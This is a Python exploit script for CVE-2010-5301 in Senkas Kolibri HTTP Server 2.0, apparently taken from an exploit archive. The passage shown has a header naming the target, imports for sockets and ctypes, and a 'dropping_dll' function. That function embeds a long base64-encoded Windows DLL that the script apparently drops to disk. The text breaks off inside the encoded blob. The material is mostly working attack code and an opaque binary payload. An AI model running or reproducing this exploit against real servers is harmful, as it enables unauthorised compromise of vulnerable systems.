#--------------------------------------------------------------------------------------#
# Title: CVE-2010-5301                                                                 #
# Author: lem0nSec                                                                     #
# Software: Senkas Kolibri HTTP Server 2.0                                             #
# Environment: Windows 7 Professional SP1 32bit                                        #
# Download link:                                                                       #
# https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip #
#--------------------------------------------------------------------------------------#

import socket
import sys
import struct
from ctypes import *
from base64 import b64decode
from time import sleep


def dropping_dll():

        # Dropping DLL on disk
        sleep(2)
        print "[+] Dropping arbitrary .dll on disk"
        sleep(2)
        b64_dll = "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AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgaUGIAAAAA/////wAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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